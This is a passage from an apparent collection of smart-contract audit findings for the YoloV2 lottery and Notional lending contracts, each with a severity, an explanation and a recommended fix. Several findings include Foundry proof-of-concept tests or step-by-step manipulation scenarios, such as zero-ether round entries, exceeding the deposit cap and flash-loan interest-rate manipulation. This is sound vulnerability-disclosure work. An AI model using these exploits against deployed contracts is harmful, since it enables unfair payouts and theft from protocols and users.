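A minimal sketch of a type-aware whitelist; the nested mapping is an illustrative replacement for the current `isCurrencyAllowed` check, with the enum and error names mirroring the quoted code:\\n```\\nmapping(address => mapping(YoloV2__TokenType => uint256)) public isCurrencyAllowed; // illustrative layout\\n\\n// In the deposit path, validate the (address, type) pair the depositor actually claims,\\n// so an ERC20 can no longer be smuggled through the ERC721 branch.\\nif (isCurrencyAllowed[tokenAddress][singleDeposit.tokenType] != 1) {\\n    revert InvalidCollection();\\n}\\n```\\n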
Users can get an arbitrary number of entries into rounds for free (which should generally allow them to significantly increase their chances of winning). In the case the winner is a free depositor, they will end up with the same profit as if they participated normally since they have to pay the fee over the total value of the deposits (which includes the price of their free deposits). If the winner is an honest depositor, they still have to pay the full fee including the free entries, but they are unable to claim the value for the free entries (since the `tokenId` (or amount) is zero). They earn less profit than if everyone had participated honestly.
```\\n if (isCurrencyAllowed[tokenAddress] != 1) {\\n revert InvalidCollection();\\n }\\n```\\n
Users can deposit "0" ether to any round
high
The main invariant to determine the winner is that the indexes must be in ascending order with no repetitions. Therefore, depositing "0" is strictly prohibited as it does not increase the index. However, there is a method by which a user can easily deposit "0" ether to any round without any cost other than gas.\\nAs stated in the summary, depositing "0" will not increment the entryIndex, leading to a potential issue with the indexes array. This, in turn, may result in an unfair winner selection due to how the upper bound is determined in that array during winner selection.\\nLet's check the following code snippet in the `depositETHIntoMultipleRounds` function:\\n```\\nfor (uint256 i; i < numberOfRounds; ++i) {\\n uint256 roundId = _unsafeAdd(startingRoundId, i);\\n Round storage round = rounds[roundId];\\n uint256 roundValuePerEntry = round.valuePerEntry;\\n if (roundValuePerEntry == 0) {\\n (, , roundValuePerEntry) = _writeDataToRound({roundId: roundId, roundValue: 0});\\n }\\n\\n _incrementUserDepositCount(roundId, round);\\n\\n // @review depositAmount can be "0"\\n uint256 depositAmount = amounts[i];\\n\\n // @review 0 % ANY_NUMBER = 0\\n if (depositAmount % roundValuePerEntry != 0) {\\n revert InvalidValue();\\n }\\n uint256 entriesCount = _depositETH(round, roundId, roundValuePerEntry, depositAmount);\\n expectedValue += depositAmount;\\n\\n entriesCounts[i] = entriesCount;\\n }\\n\\n // @review will not fail as long as user deposits normally to 1 round\\n // then he can deposit to any round with "0" amounts\\n if (expectedValue != msg.value) {\\n revert InvalidValue();\\n }\\n```\\n\\nAs the "@review" comments added above explain, this is possible because, as long as the user deposits normally into one round, he can also deposit "0" amounts into any other round, since `expectedValue` will still be equal to msg.value.\\nTextual PoC: Assume Alice sends the tx with 1 ether as msg.value and an "amounts" array of [1 ether, 0, 0]. On the first loop iteration, the 1 ether is correctly credited into the round. 
On the 2nd and 3rd iterations, the loop does not revert because `depositAmount` is "0" (and 0 % roundValuePerEntry == 0), and adding 0 to `expectedValue` leaves it unchanged, so msg.value is still exactly equal to `expectedValue`.\\n```\\nif (depositAmount % roundValuePerEntry != 0) {\\n revert InvalidValue();\\n }\\n```\\n\\nCoded PoC (copy the test to `Yolo.deposit.sol` file and run the test):\\n```\\nfunction test_deposit0ToRounds() external {\\n vm.deal(user2, 1 ether);\\n vm.deal(user3, 1 ether);\\n\\n // @dev first round starts normally\\n vm.prank(user2);\\n yolo.deposit{value: 1 ether}(1, _emptyDepositsCalldata());\\n\\n // @dev user3 will deposit 1 ether to the current round(1) and will deposit\\n // 0,0 to round 2 and round3\\n uint256[] memory amounts = new uint256[](3);\\n amounts[0] = 1 ether;\\n amounts[1] = 0;\\n amounts[2] = 0;\\n vm.prank(user3);\\n yolo.depositETHIntoMultipleRounds{value: 1 ether}(amounts);\\n\\n // @dev check user3 indeed managed to deposit 0 ether to round2\\n IYoloV2.Deposit[] memory deposits = _getDeposits(2);\\n assertEq(deposits.length, 1);\\n IYoloV2.Deposit memory deposit = deposits[0];\\n assertEq(uint8(deposit.tokenType), uint8(IYoloV2.YoloV2__TokenType.ETH));\\n assertEq(deposit.tokenAddress, address(0));\\n assertEq(deposit.tokenId, 0);\\n assertEq(deposit.tokenAmount, 0);\\n assertEq(deposit.depositor, user3);\\n assertFalse(deposit.withdrawn);\\n assertEq(deposit.currentEntryIndex, 0);\\n\\n // @dev check user3 indeed managed to deposit 0 ether to round3\\n deposits = _getDeposits(3);\\n assertEq(deposits.length, 1);\\n deposit = deposits[0];\\n assertEq(uint8(deposit.tokenType), uint8(IYoloV2.YoloV2__TokenType.ETH));\\n assertEq(deposit.tokenAddress, address(0));\\n assertEq(deposit.tokenId, 0);\\n assertEq(deposit.tokenAmount, 0);\\n assertEq(deposit.depositor, user3);\\n assertFalse(deposit.withdrawn);\\n assertEq(deposit.currentEntryIndex, 0);\\n }\\n```\\n
Add the following check inside the depositETHIntoMultipleRounds function\\n```\\nif (depositAmount == 0) {\\n revert InvalidValue();\\n }\\n```\\n
High, since it will alter the game's winner selection and the attack is very cheap to perform.
```\\nfor (uint256 i; i < numberOfRounds; ++i) {\\n uint256 roundId = _unsafeAdd(startingRoundId, i);\\n Round storage round = rounds[roundId];\\n uint256 roundValuePerEntry = round.valuePerEntry;\\n if (roundValuePerEntry == 0) {\\n (, , roundValuePerEntry) = _writeDataToRound({roundId: roundId, roundValue: 0});\\n }\\n\\n _incrementUserDepositCount(roundId, round);\\n\\n // @review depositAmount can be "0"\\n uint256 depositAmount = amounts[i];\\n\\n // @review 0 % ANY_NUMBER = 0\\n if (depositAmount % roundValuePerEntry != 0) {\\n revert InvalidValue();\\n }\\n uint256 entriesCount = _depositETH(round, roundId, roundValuePerEntry, depositAmount);\\n expectedValue += depositAmount;\\n\\n entriesCounts[i] = entriesCount;\\n }\\n\\n // @review will not fail as long as user deposits normally to 1 round\\n // then he can deposit to any round with "0" amounts\\n if (expectedValue != msg.value) {\\n revert InvalidValue();\\n }\\n```\\n
The number of deposits in a round can be larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND
medium
The number of deposits in a round can be larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND, because there is no such check in the depositETHIntoMultipleRounds() or rolloverETH() functions.\\nThe depositETHIntoMultipleRounds() function is called to deposit ETH into multiple rounds, so it's possible that the number of deposits in both the current round and the next round reaches MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND.\\nWhen the current round's number of deposits reaches MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND, the round is drawn:\\n```\\n if (\\n _shouldDrawWinner(\\n startingRound.numberOfParticipants,\\n startingRound.maximumNumberOfParticipants,\\n startingRound.deposits.length\\n )\\n ) {\\n _drawWinner(startingRound, startingRoundId);\\n }\\n```\\n\\nThe _drawWinner() function calls the VRF provider to get a random number; when the random number is returned by the VRF provider, the fulfillRandomWords() function is called to choose the winner and start the next round:\\n```\\n _startRound({_roundsCount: roundId});\\n```\\n\\nIf the next round's deposit number is also MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND, the _startRound() function may draw the next round as well, so it seems that there is no chance the number of deposits in a round can become larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND:\\n```\\n if (\\n !paused() &&\\n _shouldDrawWinner(numberOfParticipants, round.maximumNumberOfParticipants, round.deposits.length)\\n ) {\\n _drawWinner(round, roundId);\\n }\\n```\\n\\nHowever, the _startRound() function will draw the round only if the protocol is not paused. Imagine the following scenario:\\nThe deposit number in `round 1` and `round 2` is MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND;\\n`round 1` is drawn; before the random number is sent back by the VRF provider, the protocol is paused by the admin for some reason;\\nThe random number is returned and the fulfillRandomWords() function is called to start round 2;\\nBecause the protocol is paused, `round 2` is set to OPEN but not drawn;\\nLater the admin unpauses the protocol; before drawWinner() can be called, some users may deposit more funds into `round 2` by calling the depositETHIntoMultipleRounds() or rolloverETH() functions, making the deposit number of `round 2` larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND.\\nPlease run the test code to verify:\\n```\\n function test_audit_deposit_more_than_max() public {\\n address alice = makeAddr("Alice");\\n address bob = makeAddr("Bob");\\n\\n vm.deal(alice, 2 ether);\\n vm.deal(bob, 2 ether);\\n\\n uint256[] memory amounts = new uint256[](2);\\n amounts[0] = 0.01 ether;\\n amounts[1] = 0.01 ether;\\n\\n // Users deposit to make the deposit number equals to MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND in both rounds\\n uint256 MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND = 100;\\n for (uint i; i < MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND / 2; ++i) {\\n vm.prank(alice);\\n yolo.depositETHIntoMultipleRounds{value: 0.02 ether}(amounts);\\n\\n vm.prank(bob);\\n yolo.depositETHIntoMultipleRounds{value: 0.02 ether}(amounts);\\n }\\n\\n // owner pause the protocol before random word returned\\n vm.prank(owner);\\n yolo.togglePaused();\\n\\n // random word returned and round 2 is started but not drawn\\n vm.prank(VRF_COORDINATOR);\\n uint256[] memory randomWords = new uint256[](1);\\n uint256 randomWord = 123;\\n randomWords[0] = randomWord;\\n yolo.rawFulfillRandomWords(FULFILL_RANDOM_WORDS_REQUEST_ID, randomWords);\\n\\n // owner unpause the protocol\\n vm.prank(owner);\\n yolo.togglePaused();\\n\\n // User deposits into round 2\\n amounts = new 
uint256[](1);\\n amounts[0] = 0.01 ether;\\n vm.prank(bob);\\n yolo.depositETHIntoMultipleRounds{value: 0.01 ether}(amounts);\\n\\n (\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n YoloV2.Deposit[] memory round2Deposits\\n ) = yolo.getRound(2);\\n\\n // the number of deposits in round 2 is larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND\\n assertEq(round2Deposits.length, MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND + 1);\\n }\\n```\\n
Add a check in the _depositETH() function, which is called by both depositETHIntoMultipleRounds() and rolloverETH(), to ensure the number of deposits cannot exceed MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND:\\n```\\n uint256 roundDepositCount = round.deposits.length;\\n\\n// Add the line below\\n if (roundDepositCount >= MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND) {\\n// Add the line below\\n revert MaximumNumberOfDepositsReached();\\n// Add the line below\\n }\\n\\n _validateOnePlayerCannotFillUpTheWholeRound(_unsafeAdd(roundDepositCount, 1), round.numberOfParticipants);\\n```\\n
This issue breaks the invariant that the number of deposits in a round can never exceed MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND.
```\\n if (\\n _shouldDrawWinner(\\n startingRound.numberOfParticipants,\\n startingRound.maximumNumberOfParticipants,\\n startingRound.deposits.length\\n )\\n ) {\\n _drawWinner(startingRound, startingRoundId);\\n }\\n```\\n
Low precision is used when checking spot price deviation
medium
Low precision is used when checking spot price deviation, which might lead to potential manipulation or create the potential for an MEV opportunity due to valuation discrepancy.\\nAssume the following:\\nThe max deviation is set to 1%\\n`nTokenOracleValue` is 1,000,000,000\\n`nTokenSpotValue` is 980,000,001\\n```\\nFile: Constants.sol\\n // Basis for percentages\\n int256 internal constant PERCENTAGE_DECIMALS = 100;\\n```\\n\\n```\\nFile: nTokenCalculations.sol\\n int256 maxValueDeviationPercent = int256(\\n uint256(uint8(nToken.parameters[Constants.MAX_MINT_DEVIATION_LIMIT]))\\n );\\n // Check deviation limit here\\n int256 deviationInPercentage = nTokenOracleValue.sub(nTokenSpotValue).abs()\\n .mul(Constants.PERCENTAGE_DECIMALS).div(nTokenOracleValue);\\n require(deviationInPercentage <= maxValueDeviationPercent, "Over Deviation Limit");\\n```\\n\\nBased on the above formula:\\n```\\nnTokenOracleValue.sub(nTokenSpotValue).abs().mul(Constants.PERCENTAGE_DECIMALS).div(nTokenOracleValue);\\n((nTokenOracleValue - nTokenSpotValue) * Constants.PERCENTAGE_DECIMALS) / nTokenOracleValue\\n((1,000,000,000 - 980,000,001) * 100) / 1,000,000,000\\n(19,999,999 * 100) / 1,000,000,000\\n1,999,999,900 / 1,000,000,000 = 1.9999999 = 1\\n```\\n\\nThe above shows that the oracle and spot values have deviated by 1.99999%, which is close to 2%. However, due to a rounding error, it is rounded down to 1%, and the TX will not revert.
Consider increasing the precision.\\nFor instance, increasing the precision from `Constants.PERCENTAGE_DECIMALS` (100) to 1e8 would have caught the issue mentioned earlier in the report even after the rounding down.\\n```\\nnTokenOracleValue.sub(nTokenSpotValue).abs().mul(1e8).div(nTokenOracleValue);\\n((nTokenOracleValue - nTokenSpotValue) * 1e8) / nTokenOracleValue\\n((1,000,000,000 - 980,000,001) * 1e8) / 1,000,000,000\\n(19,999,999 * 1e8) / 1,000,000,000 = 1999999.9 = 1999999\\n```\\n\\n1% of 1e8 = 1000000\\n```\\nrequire(deviationInPercentage <= maxValueDeviationPercent, "Over Deviation Limit")\\nrequire(1999999 <= 1000000, "Over Deviation Limit") => Revert\\n```\\n
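A minimal sketch of the higher-precision check, assuming a new illustrative constant `DEVIATION_PRECISION = 1e8` and that the configured `maxValueDeviationPercent` is re-scaled to the same precision (both the name and the scaling are assumptions, not existing code):\\n```\\n// Sketch only: deviation check at 1e8 precision instead of PERCENTAGE_DECIMALS (100).\\nint256 constant DEVIATION_PRECISION = 1e8; // hypothetical constant\\n\\nint256 deviationScaled = nTokenOracleValue.sub(nTokenSpotValue).abs()\\n .mul(DEVIATION_PRECISION)\\n .div(nTokenOracleValue);\\n// The configured limit (a whole percent) is scaled up to the same precision,\\n// e.g. 1% => 1 * (DEVIATION_PRECISION / 100) = 1,000,000.\\nrequire(\\n deviationScaled <= maxValueDeviationPercent.mul(DEVIATION_PRECISION / 100),\\n "Over Deviation Limit"\\n);\\n```\\nWith the numbers above, `deviationScaled` is 1,999,999 against a limit of 1,000,000, so the transaction now reverts as intended.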
The purpose of the deviation check is to ensure that the spot market value is not manipulated. If the deviation check is not accurate, it might lead to potential manipulation or create the potential for an MEV opportunity due to valuation discrepancy.
```\\nFile: Constants.sol\\n // Basis for percentages\\n int256 internal constant PERCENTAGE_DECIMALS = 100;\\n```\\n
The use of spot data when discounting is subjected to manipulation
medium
The use of spot data when discounting is subjected to manipulation. As a result, malicious users could receive more cash than expected during redemption by performing this manipulation. Since this is zero-sum, the attacker's gain is the protocol's loss.\\nWhen redeeming wfCash before maturity, the `_sellfCash` function will be executed.\\nAssume that there is insufficient fCash left on the wrapper to be sold back to the Notional AMM. In this case, the `getPrincipalFromfCashBorrow` view function will be used to calculate the amount of prime cash to be withdrawn for a given fCash amount and sent to the users.\\nNote that the `getPrincipalFromfCashBorrow` view function uses spot data (spot interest rate, spot utilization, spot totalSupply/totalDebt, etc.) internally when computing the prime cash to be withdrawn for a given fCash. Thus, it is subjected to manipulation.\\n```\\nFile: wfCashLogic.sol\\n /// @dev Sells an fCash share back on the Notional AMM\\n function _sellfCash(\\n address receiver,\\n uint256 fCashToSell,\\n uint32 maxImpliedRate\\n ) private returns (uint256 tokensTransferred) {\\n (IERC20 token, bool isETH) = getToken(true); \\n uint256 balanceBefore = isETH ? WETH.balanceOf(address(this)) : token.balanceOf(address(this)); \\n uint16 currencyId = getCurrencyId(); \\n\\n (uint256 initialCashBalance, uint256 fCashBalance) = getBalances(); \\n bool hasInsufficientfCash = fCashBalance < fCashToSell; \\n\\n uint256 primeCashToWithdraw; \\n if (hasInsufficientfCash) {\\n // If there is insufficient fCash, calculate how much prime cash would be purchased if the\\n // given fCash amount would be sold and that will be how much the wrapper will withdraw and\\n // send to the receiver. Since fCash always sells at a discount to underlying prior to maturity,\\n // the wrapper is guaranteed to have sufficient cash to send to the account.\\n (/* */, primeCashToWithdraw, /* */, /* */) = NotionalV2.getPrincipalFromfCashBorrow( \\n currencyId,\\n fCashToSell, \\n getMaturity(),\\n 0, \\n block.timestamp\\n ); \\n // If this is zero then it signifies that the trade will fail.\\n require(primeCashToWithdraw > 0, "Redeem Failed"); \\n\\n // Re-write the fCash to sell to the entire fCash balance.\\n fCashToSell = fCashBalance;\\n }\\n```\\n\\nThe `CalculationViews.getPrincipalFromfCashBorrow` view function relies on the `InterestRateCurve.calculatefCashTrade` function to compute the cash to be returned based on the current interest rate model.\\nAssume that the current utilization rate is slightly above Kink 1. When Bob redeems his wfCash, the interest rate used falls within the gentle slope between Kink 1 and Kink 2. Let the interest rate based on the current utilization be 4%. The amount of fCash will be discounted back with a 4% interest rate to find the cash value (present value), and the returned value is $x$.\\nObserve that below Kink 1, the interest rate changes sharply. If one could nudge the utilization toward the left (toward zero) and cause the utilization to fall between Kink 0 and Kink 1, the interest rate would fall sharply. Since the utilization is computed as `utilization = totalfCash/totalCashUnderlying`, one could deposit prime cash into the market to increase the denominator (totalCashUnderlying) and bring down the utilization rate.\\nBob deposits a specific amount of prime cash (either with his own funds or via a flash loan) to reduce the utilization rate, which results in a reduction in the interest rate. Assume that the interest rate reduces to 1.5%. 
The amount of fCash will be discounted at the lower interest rate of 1.5%, which results in a higher cash value, and the returned value/received cash is $y$.\\n$y > x$, so Bob receives $y - x$ more cash than if he had not performed the manipulation. Since this is zero-sum, Bob's gain is the protocol's loss.\\n
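To make the gain concrete, assume for illustration that the present value is roughly $PV \\approx fCash \\cdot e^{-r \\cdot t}$ (continuous discounting, in line with how Notional's market math behaves) with $fCash = 1{,}000{,}000$ units and a quarter of a year to maturity ($t = 0.25$):\\n$$ x \\approx 1{,}000{,}000 \\cdot e^{-0.04 \\cdot 0.25} \\approx 990{,}050 \\qquad y \\approx 1{,}000{,}000 \\cdot e^{-0.015 \\cdot 0.25} \\approx 996{,}257 $$\\nso the manipulation nets Bob roughly $y - x \\approx 6{,}200$ extra cash units before the cost of the manipulating deposit itself; the exact figures depend on the live curve parameters, so these numbers are illustrative only.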
Avoid using spot data when computing the amount of assets that the user is entitled to during redemption. Consider using a TWAP/Time-lagged oracle to guard against potential manipulation.
Malicious users could receive more cash than expected during redemption by performing manipulation. Since this is a zero-sum, the attacker's gain is the protocol loss.
```\\nFile: wfCashLogic.sol\\n /// @dev Sells an fCash share back on the Notional AMM\\n function _sellfCash(\\n address receiver,\\n uint256 fCashToSell,\\n uint32 maxImpliedRate\\n ) private returns (uint256 tokensTransferred) {\\n (IERC20 token, bool isETH) = getToken(true); \\n uint256 balanceBefore = isETH ? WETH.balanceOf(address(this)) : token.balanceOf(address(this)); \\n uint16 currencyId = getCurrencyId(); \\n\\n (uint256 initialCashBalance, uint256 fCashBalance) = getBalances(); \\n bool hasInsufficientfCash = fCashBalance < fCashToSell; \\n\\n uint256 primeCashToWithdraw; \\n if (hasInsufficientfCash) {\\n // If there is insufficient fCash, calculate how much prime cash would be purchased if the\\n // given fCash amount would be sold and that will be how much the wrapper will withdraw and\\n // send to the receiver. Since fCash always sells at a discount to underlying prior to maturity,\\n // the wrapper is guaranteed to have sufficient cash to send to the account.\\n (/* */, primeCashToWithdraw, /* */, /* */) = NotionalV2.getPrincipalFromfCashBorrow( \\n currencyId,\\n fCashToSell, \\n getMaturity(),\\n 0, \\n block.timestamp\\n ); \\n // If this is zero then it signifies that the trade will fail.\\n require(primeCashToWithdraw > 0, "Redeem Failed"); \\n\\n // Re-write the fCash to sell to the entire fCash balance.\\n fCashToSell = fCashBalance;\\n }\\n```\\n
External lending can exceed the threshold
medium
Due to an incorrect calculation of the max lending amount, external lending can exceed the external withdrawal threshold. If this restriction/threshold is not adhered to, users or various core functionalities within the protocol will have issues redeeming or withdrawing their prime cash.\\nThe following is the extract from the Audit Scope Documentation provided by the protocol team on the contest page that describes the external withdraw threshold:\\n● External Withdraw Threshold: ensures that Notional has sufficient liquidity to withdraw from an external lending market. If Notional has 1000 units of underlying lent out on Aave, it requires 1000 * externalWithdrawThreshold units of underlying to be available on Aave for withdraw. This ensures there is sufficient buffer to process the redemption of Notional funds. If available liquidity on Aave begins to drop due to increased utilization, Notional will automatically begin to withdraw its funds from Aave to ensure that they are available for withdrawal on Notional itself.\\nTo ensure the redeemability of Notional's funds on external lending markets, Notional requires there to be redeemable funds on the external lending market that are a multiple of the funds that Notional has lent on that market itself.\\nAssume that the `externalWithdrawThreshold` is 200% and the underlying is USDC. Therefore, `PERCENTAGE_DECIMALS/externalWithdrawThreshold = 100/200 = 0.5` (Line 83-84 below). This means that the number of USDC to be available on AAVE for withdrawal must be two (2) times the number of USDC Notional lent out on AAVE (A multiple of 2).\\nThe `externalUnderlyingAvailableForWithdraw` stores the number of liquidity in USDC on the AAVE pool available to be withdrawn.\\nIf `externalUnderlyingAvailableForWithdraw` is 1000 USDC and `currentExternalUnderlyingLend` is 400 USDC, this means that the remaining 600 USDC liquidity on the AAVE pool is not owned by Notional.\\nThe `maxExternalUnderlyingLend` will be `600 * 0.5 = 300`. Thus, the maximum amount that Notional can lend externally at this point is 300 USDC.\\nAssume that after Notional has lent 300 USDC externally to the AAVE pool.\\nThe `currentExternalUnderlyingLend` will become `400+300=700`, and the `externalUnderlyingAvailableForWithdraw` will become `1000+300=1300`\\nFollowing is the percentage of USDC in AAVE that belong to Notional\\n```\\n700/1300 = 0.5384615385 (53%).\\n```\\n\\nAt this point, the invariant is broken as the number of USDC to be available on AAVE for withdrawal is less than two (2) times the number of USDC lent out on AAVE after the lending.\\n```\\nFile: ExternalLending.sol\\n function getTargetExternalLendingAmount(\\n..SNIP..\\n uint256 maxExternalUnderlyingLend;\\n if (oracleData.currentExternalUnderlyingLend < oracleData.externalUnderlyingAvailableForWithdraw) {\\n maxExternalUnderlyingLend =\\n (oracleData.externalUnderlyingAvailableForWithdraw - oracleData.currentExternalUnderlyingLend)\\n .mul(uint256(Constants.PERCENTAGE_DECIMALS))\\n .div(rebalancingTargetData.externalWithdrawThreshold);\\n } else {\\n maxExternalUnderlyingLend = 0;\\n }\\n```\\n\\nThe root cause is that when USDC is deposited to AAVE to get aUSDC, the total USDC in the pool increases. Therefore, using the current amount of USDC in the pool to determine the maximum deposit amount is not an accurate measure of liquidity risk.
To ensure that a deposit does not exceed the threshold, the following formula should be used to determine the maximum deposit amount:\\nLet's denote:\\n$T$ as PERCENTAGE_DECIMALS / externalWithdrawThreshold (0.5 in this example)\\n$L$ as the currentExternalUnderlyingLend\\n$W$ as the externalUnderlyingAvailableForWithdraw\\n$D$ as the deposit (the variable we want to solve for)\\n$$ T = \\frac{L + D}{W + D} $$\\nSolving for $D$, the formula for calculating the maximum deposit ($D$) is\\n$$ D = \\frac{TW-L}{1-T} $$\\nReusing the same example from the "Vulnerability Detail" section, the maximum deposit amount is as follows:\\n```\\nD = (TW - L) / (1 - T)\\nD = (0.5 * 1000 - 400) / (1 - 0.5)\\nD = (500 - 400) / 0.5 = 200\\n```\\n\\nIf 200 USDC is lent out, it will still not exceed the threshold of 200%, which demonstrates that the formula keeps the multiple of two (200%) constant before and after the deposit.\\n```\\n(400 + 200) / (1000 + 200) = 0.5\\n```\\n
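A sketch of how `getTargetExternalLendingAmount` could apply this bound on-chain without fractions (it assumes `externalWithdrawThreshold` is strictly greater than PERCENTAGE_DECIMALS, i.e. a threshold above 100%, so the denominator is positive; this is a sketch, not the existing implementation):\\n```\\n// Sketch only: D = (T*W - L) / (1 - T) with T = PERCENTAGE_DECIMALS / externalWithdrawThreshold,\\n// rearranged as D = (W*PERCENTAGE_DECIMALS - L*externalWithdrawThreshold)\\n// / (externalWithdrawThreshold - PERCENTAGE_DECIMALS)\\nuint256 threshold = rebalancingTargetData.externalWithdrawThreshold;\\nuint256 availableScaled = oracleData.externalUnderlyingAvailableForWithdraw\\n .mul(uint256(Constants.PERCENTAGE_DECIMALS));\\nuint256 lentScaled = oracleData.currentExternalUnderlyingLend.mul(threshold);\\nif (availableScaled > lentScaled) {\\n maxExternalUnderlyingLend =\\n (availableScaled - lentScaled).div(threshold - uint256(Constants.PERCENTAGE_DECIMALS));\\n} else {\\n maxExternalUnderlyingLend = 0;\\n}\\n```\\nPlugging in the example above (W = 1000, L = 400, threshold = 200) gives (1000*100 - 400*200) / (200 - 100) = 200, matching the hand-derived result.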
To ensure the redeemability of Notional's funds on external lending markets, Notional requires there to be redeemable funds on the external lending market that are a multiple of the funds that Notional has lent on that market itself.\\nIf this restriction is not adhered to, users or various core functionalities within the protocol will have issues redeeming or withdrawing their prime cash. For instance, users might not be able to withdraw their assets from the protocol due to insufficient liquidity, or liquidation cannot be carried out due to lack of liquidity, resulting in bad debt accumulating within the protocol and negatively affecting the protocol's solvency.
```\\n700/1300 = 0.5384615385 (53%).\\n```\\n
Rebalance will be delayed due to revert
medium
The rebalancing of unhealthy currencies will be delayed due to a revert, resulting in an excess of liquidity being lent out in the external market. This might affect the liquidity of the protocol, potentially resulting in withdrawal or liquidation having issues executed due to insufficient liquidity.\\nAssume that Notional supports 5 currencies ($A, B, C, D, E$), and the Gelato bot is configured to call the `checkRebalance` function every 30 minutes.\\nAssume that the current market condition is volatile. Thus, the inflow and outflow of assets to Notional, utilization rate, and available liquidity at AAVE change frequently. As a result, the target amount that should be externally lent out also changes frequently since the computation of this value relies on the spot market information.\\nAt T1, when the Gelato bot calls the `checkRebalance()` view function, it returns that currencies $A$, $B$, and $C$ are unhealthy and need to be rebalanced.\\nShortly after receiving the execution payload from the `checkRebalance()`, the bot submits the rebalancing TX to the mempool for execution at T2.\\nWhen the rebalancing TX is executed at T3, one of the currencies (Currency $A$) becomes healthy. As a result, the require check at Line 326 will revert and the entire rebalancing transaction will be cancelled. Thus, currencies $B$ and $C$ that are still unhealthy at this point will not be rebalanced.\\nIf this issue occurs frequently or repeatedly over a period of time, the rebalancing of unhealthy currencies will be delayed.\\n```\\nFile: TreasuryAction.sol\\n function _rebalanceCurrency(uint16 currencyId, bool useCooldownCheck) private { \\n RebalancingContextStorage memory context = LibStorage.getRebalancingContext()[currencyId]; \\n // Accrues interest up to the current block before any rebalancing is executed\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId); \\n PrimeRate memory pr = PrimeRateLib.buildPrimeRateStateful(currencyId); \\n\\n bool hasCooldownPassed = _hasCooldownPassed(context); \\n (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) = \\n _isExternalLendingUnhealthy(currencyId, oracle, pr); \\n\\n // Cooldown check is bypassed when the owner updates the rebalancing targets\\n if (useCooldownCheck) require(hasCooldownPassed || isExternalLendingUnhealthy); \\n```\\n
If one of the currencies becomes healthy when the rebalance TX is executed, consider skipping this currency and move on to execute the rebalance on the rest of the currencies that are still unhealthy.\\n```\\nfunction _rebalanceCurrency(uint16 currencyId, bool useCooldownCheck) private { \\n RebalancingContextStorage memory context = LibStorage.getRebalancingContext()[currencyId]; \\n // Accrues interest up to the current block before any rebalancing is executed\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId); \\n PrimeRate memory pr = PrimeRateLib.buildPrimeRateStateful(currencyId); \\n\\n bool hasCooldownPassed = _hasCooldownPassed(context); \\n (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) = \\n _isExternalLendingUnhealthy(currencyId, oracle, pr); \\n\\n // Cooldown check is bypassed when the owner updates the rebalancing targets\\n// Remove the line below\\n if (useCooldownCheck) require(hasCooldownPassed || isExternalLendingUnhealthy);\\n// Add the line below\\n if (useCooldownCheck && !hasCooldownPassed && !isExternalLendingUnhealthy) return;\\n```\\n
The rebalancing of unhealthy currencies will be delayed, resulting in an excess of liquidity being lent out to the external market. This might affect the liquidity of the protocol, potentially causing withdrawals or liquidations to fail due to insufficient liquidity.
```\\nFile: TreasuryAction.sol\\n function _rebalanceCurrency(uint16 currencyId, bool useCooldownCheck) private { \\n RebalancingContextStorage memory context = LibStorage.getRebalancingContext()[currencyId]; \\n // Accrues interest up to the current block before any rebalancing is executed\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId); \\n PrimeRate memory pr = PrimeRateLib.buildPrimeRateStateful(currencyId); \\n\\n bool hasCooldownPassed = _hasCooldownPassed(context); \\n (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) = \\n _isExternalLendingUnhealthy(currencyId, oracle, pr); \\n\\n // Cooldown check is bypassed when the owner updates the rebalancing targets\\n if (useCooldownCheck) require(hasCooldownPassed || isExternalLendingUnhealthy); \\n```\\n
Rebalance might be skipped even if the external lending is unhealthy
medium
The deviation between the target and current lending amount (offTargetPercentage) will be underestimated due to an incorrect calculation. As a result, a rebalancing might be skipped even if the existing external lending is unhealthy.\\nThe formula used within the `_isExternalLendingUnhealthy` function below to calculate the `offTargetPercentage` can be simplified as follows for readability.\\n$$ offTargetPercentage = \\frac{\\mid currentExternalUnderlyingLend - targetAmount \\mid}{currentExternalUnderlyingLend + targetAmount} \\times 100% $$\\nAssume that the `targetAmount` is 100 and `currentExternalUnderlyingLend` is 90. The off-target percentage will be 5.26%, which is incorrect.\\n```\\noffTargetPercentage = abs(90 - 100) / (100 + 90) = 10 / 190 = 0.0526 = 5.26%\\n```\\n\\nThe correct approach is to calculate the off-target percentage as a ratio of the difference to the target:\\n$$ offTargetPercentage = \\frac{\\mid currentExternalUnderlyingLend - targetAmount \\mid}{targetAmount} \\times 100% $$\\n```\\noffTargetPercentage = abs(90 - 100) / (100) = 10 / 100 = 0.10 = 10%\\n```\\n\\n```\\nFile: TreasuryAction.sol\\n function _isExternalLendingUnhealthy(\\n uint16 currencyId,\\n IPrimeCashHoldingsOracle oracle,\\n PrimeRate memory pr\\n ) internal view returns (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) {\\n oracleData = oracle.getOracleData(); \\n\\n RebalancingTargetData memory rebalancingTargetData =\\n LibStorage.getRebalancingTargets()[currencyId][oracleData.holding]; \\n PrimeCashFactors memory factors = PrimeCashExchangeRate.getPrimeCashFactors(currencyId); \\n Token memory underlyingToken = 